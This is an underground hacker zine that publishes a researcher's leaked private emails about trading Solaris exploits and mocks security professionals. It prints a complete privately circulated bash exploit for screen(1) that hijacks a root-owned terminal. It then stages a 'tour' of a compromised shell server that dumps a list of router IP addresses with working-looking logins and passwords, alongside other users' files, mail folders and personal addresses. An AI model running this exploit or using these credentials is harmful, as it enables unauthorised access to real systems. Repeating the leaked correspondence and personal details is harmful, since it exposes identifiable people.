/var/dt/tmp/DTSPCD.log * * * For fix information see: * CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess * Control Service * * * some thanks/greets to: * gersh, yowie, plaguez, sircasm, K2, silitek, SolarDiz, _j_j, none, %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: no D1ck ir sin Subject: RE: . Noir, check this out... a friend of mine coded it up... I'll get ya that ttdb sploit soon, I'm just travelling in the US right now. I hope you hadd a good Xmas/New Year... Later, K2 noir sin wrote: > Hi K2, > > nothing much these days, I am packing up ; ). will change the damn place I > am living .. so not much coding or anything > so how you doin? btw, happy new year > > > BTW: I passed your code to a couple of ADM guys, they really liked it. > which one telnetd or Tru64 ttdb ? > > I didnt work on the ttdb fmt exploit lately. I will be so much happy if you > could enlighten me about the issue ... > Actually, I am working out a project that will pack almost all known > exploits and some unknown exploits > for Solaris and maybe some Tru64. ( well main reason is I only got some > Solaris boxens and a Tru64 access ) > > I wish to keep in touch with skilled ppl like you, I believe we can exchange > real good info. > > take care, > noir > > -----Original Message----- > From: K2 [mailto:ktwo@ktwo.ca] > To: noir@olympos.org > Subject: . > > noir, How is it going? You getting that ttdb code working? I've got some > time next week if you still having trouble, I'll work it out. > > BTW: I passed your code to a couple of ADM guys, they really liked it. > > Take care, > K2 > Attach: dtspcd-8.4.tgz Size: 30K note: a glimpse of the most elite zeroday trading network %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Subject: West Point Hey Lance, Glad to hear that nfo helped out :) I got clearence to get late february off to go speak if the spot's still open :) Lemme know thx!! K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspc attack Expect a ADMmutate copy eventually ;) but i was talking to my man... and like you can ask me questions to relay to him if you want. Cool about West Point I'll leason with Dragos for flights and stuffs... Thx again. K2 Lance Spitzner wrote: > K2 wrote: > > Hey Lance, This version of the dtspcd exploit has been out for quite some > > time. at least 3 months, it's the same version Ihave. Do you know what > > signature it set off from snort? > > Standard SPARC Shellcode, alert below. > > [**] [1:645:2] SHELLCODE sparc NOOP [**] > [Classification: Executable code was detected] [Priority: 1] > :05.950417 208.61.1.160:3594 -> 172.16.1.102:6112 > TCP TTL:48 TOS:0x0 ID:41402 IpLen:20 DgmLen:1500 DF > ***AP*** Seq: 0xFF24BFA4 Ack: 0x5F79CFDD Win: 0x3EBC TcpLen: 32 > TCP Options (3) => NOP NOP TS: 463986841 4158950 > [Xref => http://www.whitehats.com/info/IDS353] > > > The guy that wrote it put in some passwords for binaires that would be > > distributed, so unfortuntatly some kiddies probably got it and are running > > it all over the 'net :( > > heh heh, I sure do. First, do you have an exact date when this code > exploit was written? I'm curious to see how long it went from actual > code to the the kiddie community. > I'm thinking of writing a KYE paper on this exploit. The paper would > outline the life cycle of an exploit. From vulnerability identification, > to exploit code, to common kiddie use. We seem to have knowledge of > all the elements. This would make a very beneficial paper to the > community if we could document this process. What do you think about > such a paper? We would need some input from the person who wrote the > exploit, but anonymity would not be a problem. I know alot of .gov/.mil > people would be very interested in such a work. Thoughts? > > By the way, you are famous as hell with the following agencies, Max > Kilger and I talked about you. > > NSA, CIA, FBI, DoD, NSF, NIST, DARPA, NPS, DoJ, Secret Service, etc ... :) > > love and kisses ... > > lance > note: ktwo and lance are the best narc duo i've ever seen %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: West Point, we are a go Lance, What dates should I get booked off from work? (I'm actually just going to work remotely, so I can be pretty libral). What format will the talks be? Any of the SUN box's look pretty fly man :) I love rack mount!! I'll take a peek at that paper soon, I'm remote from home until next week so I'm pretty slow on a few things (I am in the US right now). TTYL! K2 Lance Spitzner wrote: > All right gents, > > We are a go for West Point on 26 December. Dragos, > as always I'm putting in a personal request for the > leather pants. I need a bio from you folks, so send > me one before Monday if possible. They need the bios > so they can determine just how many people are going > to attend our presentation :) > > They asked for estimates on travel expenses, this is > what I gave them (just for travelling). > > Dragos/K2 - $1,200 each > Michael/Jeff - $150 each > > Go ahead and make your travel arrangements know (especially > K2 and Dragos). If my travel estimates are off, I need > to know now. This is what they told me about airports > --- snip snip --- > > The best airport is Stewart/Newburgh (SWF) about 20 miles north of West > Point. Other airports in order of ease/distance include: > > Newark, NJ (EWR) > LaGuardia, NY (LGA) > JFK, NY (JFK) > > Although I have never flown in/out of Westchester (HPN), I have heard > positive things about the airport if you can get a flight. > > --- snip snip --- > > -- > Lance Spitzner > http://project.honeynet.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Viz Engine Subject: Re: your mail Sure, I'll take a look. K2 Viz Engine wrote: > hi, > > I have a privat exploit for wu-imapd, developed it for linux and BSD. > Since I have no access to Solaris or HP-UX I would like to ask you to > port it to that systems. Would you? > > Viz %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: glined glined is a type of ban off IRC "I was glined" == "I was globally banned from the undernet" if you connect multiple times to IRC with the same IP (3 or more), you will be glined (for abuse) Take care, K2 Lance Spitzner wrote: > Dude, > > What in the hell does 'glined' mean? This is taken > from the GFORCE chats. > > :D1ck :i have the whole billing system > :D1ck :glined > :D1ck :i have the whole billing system of example > :D1ck :oye > :D1ck :heh > :J4n3 :lol > :J4n3 :glined how ? > :J4n3 :they didn't have the same ip > :J4n3 :billing system of example ?? > > Thanks! > > -- > Lance Spitzner > http://project.honeynet.org note: lance is a dumb fuck %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspc attack Here is what I got from jduck, (talk to him too see if he wants his name in the final report though). I can help with the writeup when I get back to Van, jd said it's cool if you contact him too. [jduck(dcc)] 1. discovered by aix in 1999 [jduck(dcc)] aix fixed it in 1999 [jduck(dcc)] 2. re-discovered by ISS in 2000 in solaris [jduck(dcc)] err 2001 perhaps? [d[jduck(dcc)] disclosed to sun in march 2001 jduck(dcc)] cert/iss/etc disclosed to public november 2001 [jduck(dcc)] exploit created late november 2001 [jduck(dcc)] given to trusted people and testers [jduck(dcc)] careless left around by certain people and stolen < [jduck(dcc)] shared by unknown others jdrake@qoop.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: R1Ley Hassell Subject: Re: Hey man sure, just keep it to self right ;) What's new? I'm still lookin for new work :( Later, K2 Riley Hassell wrote: > You got a copy of the new dtspc sploit? > > -R > Attach: dtspcd-8.6.tgz Size: 35K %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit usage OK, gimme some time on this one, I've never used the sploit. Lance Spitzner wrote: > K2, > > Dude, I notified several .gov agencies that we > have obtained the exploit. They can use this > information to better protect against attacks. > I figured your buddy will not mind, as we obtained > it from 'the wild'. > > Anyways, could you give me a short paragraph on > how the exploit works and is used? Organizations > need to understand how the tool works, and how > the kiddies can use it. You are the > expert, so your insight will greatly help. > > Thanks! > > lance > note: cant figure it out smart guy? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit obtained (fwd) I'll ask him Lance Spitzner wrote: > Your buddy interested in chatting with the MITRE folks? > Alot of people are very impresses with his exploit :) > > -- > Lance Spitzner > http://project.honeynet.org > > ---------- Forwarded message ---------- > From: J4ne Gray > To: Lance Spitzner > Subject: Re: dtspcd exploit obtained > > I went to the apparent authors website. It hardly mentions an interest in +security, > but it does look like he used to teach at the University of Central Michigan > http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with +this > person at all? > > I'm wondering if he didn't write this code to teach someone else and then that+person > started distributing it. This guy looks like he knows his stuff and not +stripping the > symbols doesn't seem to fit with that. > > Josh > > Lance Spitzner wrote: > > > J4ne Gray wrote: > > > > > It was very nice of the author to include his name and email :). I was +looking > > > at the strings output and it looks like the author took a lot of time to +do error > > > checking and write one of the better usage statements i've seen. I also +didn't > > > notice a single misspelling and no script kiddish text at first glance. +To me > > > that says a few things about the author. Is this typical of what you see +in > > > exploit code? Most of the stuff i've seen in public postings is nowhere +near > > > this clean. > > > > Its extremely well written, and powerful. Definitely not our > > typical exploit :) > > > > lance %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit obtained (fwd) that's funny Lance Spitzner wrote: > K2 wrote: > > > I'll ask him > > Dude, this is not a big deal. Just a lot of > people interested in his exploit code, its more > impressive then most. NSA and FBI even asked > me for a copy. :) > > lance note: nsa cant write their own version? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Dug Song Subject: Re: feh lame o KIller man, thx :))) Dug Song wrote: > this is the most retarded shite: > > http://www.ngsec.com/whitepapers.html > > btw, i rewrote fragrouter as fragroute (runs on your local > machine). evades everything, including snort, and it will hide all of > your shellcode NOPs as well, with any of the TCP chaffing attacks or > TCP segment forward overlap: > > http://www.monkey.org/~dugsong/fragroute-0.1.tar.gz > > don't redistribute, it's rough code that i want to clean up for > release sometime... > > -d. > > --- > http://www.monkey.org/~dugsong/ %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Cloakware Corporation Subject: Re: Network Intrusion Detection Charlene, I was just wondering, Stanley told me about a demonstration package of your cloaking technologie where a binary with some source code is sent out. Do you think I could have a copy of this? Thanks much, Shane %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: IRC chats Well, It's probably a spoof... beer:~# telnet pentagon-hqdadss.army.pentagon.mil 23 Trying 134.11.6.1... Connected to pentagon-hqdadss.army.pentagon.mil. Escape character is '^]'. VM/ESA ONLINE--HQDADSS --PRESS BREAK KEY TO BEGIN SESSION.^] telnet> q Connection closed. VM/OS box, idono, Idoubt that somebody is IRC'ng from there ;) CU K2 Lance Spitzner wrote: > Looks like one of the guys is coming in from pentagon.army.mil. > Is this correct? > > -- > Lance Spitzner > http://project.honeynet.org note: its the analyzer!!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% ---------- Forwarded message ---------- From: Matt Conover To: w00w00@blackops.org Subject: w00w00 with TechTV TechTV had a segment on the ethics of hacking with a featured commentary on w00w00. See it at http://www.techtv.com/news/security/story/0,24195,3369909,00.html. Matt note: w00w00 looks lame lately, keep it up! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan Subject: Re: your mail Catherine: Here you are, sorry for the sparsity but I am very private about many of the details outlined by the bio guidelines. K2 is a security engineer. He works on a variety of systems ranging from most any UNIX flavor to any other lesser OS. He has spent a lot of time working through security issues wherever they exist; core kernels, networking services or binary protections. K2 is a member of w00w00 and is a contributing member of The Honeynet Project. I would like to thank Anya for all her help and support throughout the year. Thanks, K2 note: Cathy, could you please add: k2 is also owned %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan cc: Kate Glennon Hi, Sorry I've been in Toronto all week and did not see these mails (i've only had remote access to mail). I'll get the changes back to you by tomarrow morning. Thanks, K2 Catherine Nolan wrote: > Hey K2 - > I need your revisions today.....the book is going to the printer next week > and I need to have your chapter copyedited, laid out, and reviewed. > If the book doesn't go to press next week - we're not going to have books in > time for doubleday book club. Doubleday has ordered a significant number of > copies for a promotion - the books must be in their warehouse by March 4th. > It takes at least a week and a half to print a book - usually longer. As a > royaltied author - if we miss this date - we miss 3500 units in sales. This > will affect your income from your contribution considerably. > > They are not happy if we don't ship our books on time. > > I cannot impress upon you the urgency of this matter - your revisions were > due on Monday - it is now Thursday. > > Please send these revisions to me as soon as you can - preferably before the > end of the day. > > Thank you, > Catherine > > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Presby, T. MAJ EECS" Subject: Re: USMA - Honey Net Travel Arrangements Major Presby: Thanks for your help, I was just wondering if is possiable that I change the return portion of this trip to layover in Kansas City until Sunday March 3 I'll pay any difference in cost (it may even be cheaper with the Saturday stay). Thanks, K2 Presby, T. MAJ EECS wrote: > K2, > > Your invitational travel orders are complete and we look forward to your > visit later this month. An electronic ticket has been generated and will be > waiting for you at the Vancouver Airport. A complete itinerary is available > at https://virtuallythere.com. Use the following reservation code and your > last name to view your itinerary. > > Reservation Code: ESEUXD > > Your flight travels via Chicago to Newark, so you will be on the same flight > as Dragos Ruiu and Lance Spitzner. Lance is authorized the rental car, so > you will travel in one vehicle to West Point. > > Your lodging costs will be covered during your stay. Please contact the > Hotel Thayer to reserve and hold your room for 25-26 Dec with your credit > card (you will be reimbursed after the fact). Hotel Thayer has a website > http://www.hotelthayer.com/ and they can be reached at 1-800-247-5047. > Ensure that you mention that you are traveling under invitational travel > orders and require the government rate. > > Please feel free to contact me if you have additional questions. We look > forward to your visit. > > Tim > Major Timothy Presby > Asst. Prof., Dept. of Electrical Engineering and Computer Science > United States Military Academy, West Point, NY 10996 > Thayer Hall 113 Phone: 845-938-5569 DSN: 688 > Email: timothy-presby@usma.edu note: hey timmy, smile for the cameras!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Subject: !.? miss you %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: joewee Subject: Re: defcon? joewee: where are you ? I'm in NYC now. TTYL K2 joewee wrote: > from dt; > > > Sounds very cool. I'd be interested in reading the book when it comes > out. People always talk about writing a book like that, but no one ever > does. > On another note, do you know if ADM or w00w00 has anything up their > sleeves > that might make for a good release at DEF CON? With the cDc basically > falling through the last two years we are looking to see if any > respectable > groups have something cool they want to showcase and release come con > time. > > ---- > > anyone plan on going to defcon? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner cc: 'Dragos Ruiu' , Subject: Re: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT (fwd) From what I hear gobbles is a composit, (made up from more then 1) person(s). But it's all speculation anyhow. There's tons of Solaris holes, and a grandious claim that "if you run it your vuln" is always BS, I'm sure a moderately hardend host would be fine. ttyl, K2 Lance Spitzner wrote: > Who the f*ck is this guy. He repeatedly has the most interesting > posts I've ever read. The note at the bottom has me concerned :) > > -- > Lance Spitzner > http://project.honeynet.org > > ---------- Forwarded message ---------- > From: gobbles@hushmail.com > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, > vuln-dev@securityfocus.com, bugs@securitytracker.com > Subject: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT > > Dear World, > Below is copy paste of GOBBLES advisory for NTOP. NTOP available from +www.ntop.org. This serious remote root bug in logging mechanism. Time for +alert and disclosure is now. > > Website with other advisories at http://www.bugtraq.org. It look like shit +because on free host. GOBBLES poor researcher who not out for the big dollar, +and nothing that can be done about this at this time. > ... > Greets: > Our #1 fan, Dave Aitel. Dave, GOBBLES love you -- you get free GOBBLES Security tshirt at Defcon. > > > Love to all (but especially to "bob"), > GOBBLES Security > http://www.bugtraq.org > GOBBLES@hushmail.com > > > ps: GOBBLES currently in communication with Sun Microsystems about lethal remote bug in Solaris 6, 7, and 8. Sun has asked GOBBLES to wait one month to release advisory so that service can be fixed. GOBBLES not sure if he can wait this long, but will try very hard to not click "send" for while longer on hole. If you run Solaris, likely you are vulnerable. But you will have to wait. > > No joke, this serious remote root hole. GOBBLES turned blind eye to argument from hackers about danger of releasing vulnerabilities. GOBBLES know that only hackers care about non-disclosure. Anyone else is likely to be very boring. :)))) > > Hey, GOBBLES considered two ways of getting fame and recognition for he world-class security group... 1. put up a message board on bugtraq.org with gobbles group name branded all over it and let world know he have private exploits... 2. submit ground-breaking research to the securityfocus mailing lists..... > > hey, the latter has a bigger audience ;))))))) > > Hush provide the worlds most secure, easy to use online applications - which solution is right for you? > HushMail Secure Email http://www.hushmail.com/ > HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/ > Hush Business - security for your Business http://www.hush.com/ > Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/ > > Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople > ------------ Output from pgp ------------ > Pretty Good Privacy(tm) Version 6.5.8 > (c) 1999 Network Associates Inc. > Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. > Export of this software may be restricted by the U.S. government. > File is signed. signature not checked. > key does not meet validity threshold. > WARNING: Because this public key is not certified with a trusted > signature, it is not known with high confidence that this public key > actually belongs to: "(KeyID: 0x2199B00F)". note: GOBBLE GOBBLE, lance afraid of the turkey?! :PpppPPpPPPp %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Ragsdale, D. LTC EECS" Subject: Re: Glad to hear you are coming to NY LTC Ragsdale: I'm glad that most of the exploits worked. The local privalage escalation exploits may be a little more trickey, I think I had sent a couple whitch will break a non-executable stack, these tend to be a lot more fradgile, maybe play with the stack offset values and script a brute forcing script... Sure, I'm sort of hap-hazardly getting my life together here, I'm booked solid through May-5, but will be available after that. Let me know whenmight work for you and I'll work with that. Talk to you later, K2 PS. My recent trip reminded me that almost 4years ago I nearly enlisted to the US Army, but then decided to go on for more school. Ragsdale, D. LTC EECS wrote: > K2; > > The Solaris exploits you sent were excellent. They were just what I > needed. I had luck with all of them except the user2root buffer overflows > - I could not get the offsets right. Any suggestions? > > Also, is there any chance we could convince you to spend a day with > us in the near future? We would pay any travel expenses and, possibly, > provide monetary compensation for your time. We would ask you to assist us > to by implementing working exploits in our lab. Tell me what you think. > > -Dan note: well Liutenant dan, ktwo already works for CSIS, sorry! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% ############### I N C L O S I N G %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% i hope you enjoyed this little look into the liFe of a whitehat, which can be summed up in: m0nEy-Ca$h-lameness. from mediocre crackers, to full blown security professionals, you've certainly made it easy on us! ktwo, be gracious we left out your kewl poems! catch me next month as i feature more whitehat allstars for your viewing pleasure. NO MERCY FOR WHITEHATS!!@#@# -- odaymaztr .~e~----------------------------------------------------------~e~. ; *03* zeroday screen exploit -- lcamtuf ; `----------------------------------------------------------------' [CUT_HERE] screen.sh #!/bin/bash # **DO NOT DISTRIBUTE** # # A simple screen(1) exploit (tested against 3.09.11) # - by Michal Zalewski (lcamtuf@bos.bindview.com) # ---------------------------------------------------- # Usage: "./unscreen", then resume screen `00'. # ---------------------------------------------------- # Ugh, blah... Should be written in C, but I don't # really care now :) # I haven't had time to check other versions, but see # if this works for you too... # # This exploit is private, but you know that already... # # **DO NOT DISTRIBUTE** # SCREEN=/usr/bin/screen umask 0 if [ ! -x $SCREEN ]; then echo "I can't execute $SCREEN..." exit 0 fi LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa if [ -f "$LINK" ]; then echo "DAMN. I don't have usable pts socket available..." exit 0 fi echo -ne "Finding root owned tty...\t\t" unset TTY for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then TTY="$x" break fi done echo -n "$TTY" if [ "$TTY" = "" ]; then echo -e "\nI can't find a root owned tty!" exit 0 fi if [ ! -w $HOME -o ! -w /tmp ]; then echo -e "\nI can't write $HOME/.screenrc or to /tmp..." exit 0 fi cat >$HOME/.screenrc <<_EOF_ vbell on defscrollback 100 autodetach on termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\' defsocketpath $LINK _EOF_ echo -ne "\nStarting screen...\t\t\t" $SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null & SCPID=`echo $!` echo -n "PID: $SCPID" while :; do sleep 1 if [ "$#" -ge "0" ]; then break fi done cd /tmp ln -fs $LINK $HOME/ &>/dev/null echo -ne "\nWaiting for socket to be created...\t" CNT=5 # Timeout while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do let CNT=$CNT-1 sleep 1 done echo -n "Done." echo -ne "\nLinking to root owned terminal...\t\t" ln -fs $TTY $LINK &>/dev/null echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..." $SCREEN -wipe &>/dev/null & rm -fr $HOME/.screenrc $LINK &>/dev/null echo -ne "\rComplete.\n" exit 1 [END_CUT] screen.sh .~e~----------------------------------------------------------~e~. ; *04* lyfestylez of the owned and lamest with pm -- r0b1nleech ; `----------------------------------------------------------------' PART ONE: Hello, and welcome, to lyfestylez of the owned and lamest hehe Our guest today is pm. pm runs one of the most secure + shell systems known to mankind, tell us about your system pm. well robin, first off i would like to introduce myself my handle stands for prepubescent monkey, no just kidding! it + stands for plurbious monk. i have hosted one of the most well known + and well renounced shell systems ever. yes thats right, i run sneakerz.org :D sneakerz.org is home to some of the finest hackers that grace + our planet earth. freebsd employees and yahoo employees also use + our super secure system. Hey pm, tell our viewers where you have worked recently :) well robin, i have worked at Yahoo!, google, hotmail, microsoft, and + iss. i have been all over.. hehe Thats quite a line up. yes r0b1n, i have a vast amount of security knowledge, i am a + security professional. props to w00w00 and ADM! oh ya, HFD! oh i would like to also state that: I HAVE NEVER BEEN OWNED, IF YOU + SAY YOU OWN ME, SHOW ME SOME FUCKING LOGS. IF YOU DONT HAVE LOGS + SHUT YOUR FUCKING LAME MOUTH BECAUSE YOU DONT OWN SHIT. hehe So pm, which known hackers have used your system? well, off the top of my head there is: jobe, napster, billf, + ratcorpse, par (cant fucking forget the par master), jbl, stran9er, + darkcube, jduck, shok, cr, cryp, suid, dmess0r, nimrood, duke + mux, yowie, udp, korndogz (kinda lame), awnex, jimjones, soupnazi, + miff (9mm HFD!), paul, and knowfx. damn i have a good memory hehe I would like to point out for a second that napster is + the guy who started napster.com, jbl is cripo of SSG, cr is one + of the best known crackers in hacker history (unix bowling team), + and duke is the best whitehat i have ever seen. yes i've watched cr hack before, he's real good and props to #!w00w00 on efnet What is the #!w00w00 key? no key for you r0b1n :) route and dugsong hang out there, really elite channel let's take a break for a second and watch some midget porn PART TWO: Welcome back, let's get on with the show. hehe I am currently on pm's system, this is an amazing sight. + This system is so locked down its ridiculous. I don't think anyone + could ever hack this. yes r0b1n, its secured real tight, and has custom freebsd kernel mods. I am currently sitting in the root directory, pm, show us + around :) why of course r0b1n. hmm where to start ok, lets just go straight to the good stuff first # cd /home/staff/monk ok here we are, my sacred directory, this is where all my private + files go, all my warez, and all my mail goes. # ls |less 983.tsl_bind.c* lice420pre7.tar.gz* BigIron-EXO1.tftp* lo* BigIron-Exo1.tftp* mail/ BigIron-HE1.tftp* md5passwd.c* BigIron-HE2.tftp* me.jpg* BigIron-SU1.tftp* moo* BigIron-SU2.tftp* ms-ip.txt Extacy.c mutt-sneakerz-14095-0* Mail/ mutt-sneakerz-309-0* Messages* mutt-sneakerz-43165-0* NetIron-HE1.tftp* new-server-guidelines.txt* NetIron-HE2.tftp* newircd.tgz* NetIron-SU1.tftp* par* NetIron-SU2.tftp* par2.pl* README* pixconfig* README.skuld* pm* Trng-07_BGP4.ppt* pos.ppt* _mywctb.ircrc* quotes.txt* a* res.txt* a.c resume.txt* acl.txt* rh7linuxconf.pl.txt ascii_woman.txt* route.gif* babykitty* sendmail.c backup.sneakerz.monk.2.28.01.tar.gz server.sh* bgp.exo* shells* bobek.c* sinner* cbufp_cb.pdf* sk8.bx* cco.txt* skuld3.tar.gz* chbin* solx86_bind.c cisco* story* cluepon.txt* temp/ dave.jpg* textbox.irc.lb3* fakepmap.c* tmp/ fbsd2.c* tranny.asc* foodfight.swf* tronban* freebsd.app* tsl_bind.c* freebsd.app.old* vchans.txt* h0h0cc.asc* wanker-14.jpg hardcopy.0 wctb.irc* hm/ wu2.6.1.c* ircchiq.tar www/ kline* xf0rce.zip libproxybnc-2.0b.tar.gz Wow, what an absolutely stunning home directory, you + so elegantly define caviar dreams. i try, hehe, thanks r0b1n Ok, show us some of your files why of course $ head imnotownedstill.txt :p_m!dave@right.behind.you PRIVMSG #!w00w00 :gobbles sucks balls :p_m!dave@right.behind.you PRIVMSG #!w00w00 :we should make them eat our shit :p_m!dave@right.behind.you PRIVMSG #!w00w00 :then shit out our shit :p_m!dave@right.behind.you PRIVMSG #!w00w00 :then make them eat the the shit that they shit that was our shit that we made them eat :p_m!dave@right.behind.you PRIVMSG #!w00w00 :*read slowly* :p_m!dave@right.behind.you PRIVMSG #!w00w00 :GOBBLES: :p_m!dave@right.behind.you PRIVMSG #!w00w00 :"ALL YOU MOTHER FUCKERS ARE GONNA PAY, YOU ARE THE ONES WHO ARE THE BALL LICKERS, WE'RE GONNA FUCK YOUR MOTHERS WHILE YOU WATCH AND CRY LIKE LITTLE WHINEY BITCHES, ONCE WE GET TO HOLLYWOOD AND FIND THOSE MIRAMAX FUCKS WHOS MAKEN THE MOVE WE'RE GONNA MAKE THEM EAT OUR SHIT THEN SHIT OUT OUR SHIT AND THEN EAT THEIR SHIT THATS MADE UP OF OUR SHIT THAT WE MADE THEM EAT AND THEN ALL YOU MOTHERFUCKS ARE NEXT" :p_m!dave@right.behind.you PRIVMSG #!w00w00 :-w00w00 ok lets see, ah, shells is a pretty private file, i use it for + hacking elite shit. # head -n 20 shells 12.0.40.1 - cisco 12.127.196.202 - cisco1:cisco 131.192.70.218 (s0.inso.bbnplanet.net) - cisco 157.130.68.154 (rutenberg-gw.customer.ALTER.NET) - cisco:cisco 192.195.18.6 (cisco.nstor.com) - cisco 194.149.131.1 (e0-rbs1.MARNet.mk) - gone:quattro224 / ena:%qqriq% 194.149.131.10 (e0-0-rbs3.MARNet.mk) 194.149.131.127 (tc.rek.ukim.edu.mk) - gone:quattro224 / ena:%qqriq% 194.149.131.3 (e0-rbs2.UKIM.edu.mk) 194.149.144.1 - gone:mitre-strelata / ena:rtremt-toboim 194.149.148.2 (rtrzsv.zsv.ukim.edu.mk) - gone:quattro224 / ena:%qqriq% 194.149.150.1 - gone:quattro224 / ena:%qqriq% 194.98.212.19 (bowne-gw.iway.fr) - cisco 200.41.13.242 (200.41.13.242.celcaribe.net) - admin:admin 200.41.13.253 (200.41.13.253.celcaribe.net) - admin:admin 202.109.81.230 - cisco:cisco (switch) 202.161.128.22 - cisco 202.54.40.17 - cisco:cisco 204.167.134.158 (s0.aww.bbnplanet.net) - test:test 207.115.184.1 - cisco Oh, My, God, are those seriously .edu.mk routers?! :) ok check this out # ls Mail 4166174806@mobile.att.net jack@google.com spider@funksion.org beep-spider@jsnet.com knowfx@sneakerz.org spider@hotmail.com beepspider@jsnet.com monk@sneakerz.org spider@sneakerz.org binary@ruiner.halo.nu paul@mu.org sweetiegirl331@aol.com bright@wintelcom.net promo@akula.com walt@hotmail.com dav@sneakerz.org soupnazi@sneakerz.org i met sweetiegrl331 in #linuxteens, damn shes amazing Love :) Hey, I noticed a route.gif in the above output of ls? thats route naked at r00tparty 3. enough with my homedir for a second, lets check out ratcorpse's # cd /home/users/rat # ls Mail/ funny* me-modified.jpg* rc.c* adaptec gogo226a.tgz me-original.jpg* shrt* ass2.doc* hahaha mp3s.txt* sk8.bx* badass.jpg hehh* ncurses.h sk8.irc* blingbling.jpg index.html* netscape1.c.txt* term.h buffr.c* ircrc.example* newfris.jpg* tmp/ damnfunny ircrc.global* ns* tron.txt* dickd.tar.gz* jim* orange1.jpg url* elite.c* leto* pageexec.txt* vas0103.txt* epic* llist.c* patch-howto.html vhosts* f* log.txt r* wargames* fefe.zip* mbox rand0m.c* www/ shes so funny, check out the www # ls www/ 06cubicl.jpg* leet.adv* pumpkin.jpg* Bow-lusta.txt* lice420pre7.tar* resume* OBSDecian* links.html* route.gif* akittens-confessionz* list* route.jpg* angieb.jpg* logs.html* rpclogo.jpg* crow/ look.jpg* s/ cvf-sk00led* m1x* sexchart* cvf-sk00led2* me.gif* shot/ dance.gif* me.html* siphon-v.7.tar* duke/ misc/ slut1.jpg* dumbkitten.txt* mixowned* slut2.jpg* dxmd.jpg* modified.jpg* some-funny-ass-takeover* dxmpix/ p.jpg* sundevices.beta* freestyle* pageexec.txt* toomuchtime.jpg* fugly/ party/ u4ea-skooled* ghettodxm.jpg* phat1.jpg* url* gookfest.jpg* phat2.jpg* war* greets.html* phat3.jpg* warped.jpg* gross/ phat4.jpg* weed.jpg* housewarming.jpg* phracklog* whore.jpg* hp2.adv* pix/ work/ in-bud-we-trust.jpg* potleaf1.jpg* index.html* prankster.jpg* lol, thats confidence This is great, are you getting all of this guys? hohohoho check this out # cat mailstuff | less bright:> To: bright@sneakerz.org bright:Delivered-To: alfred@freebsd.org bright:Delivered-To: bright@sneakerz.org bright:Errors-To: announce-admin@bafug.org bright:Reply-To: Bill Fumerola bright:Reply-To: 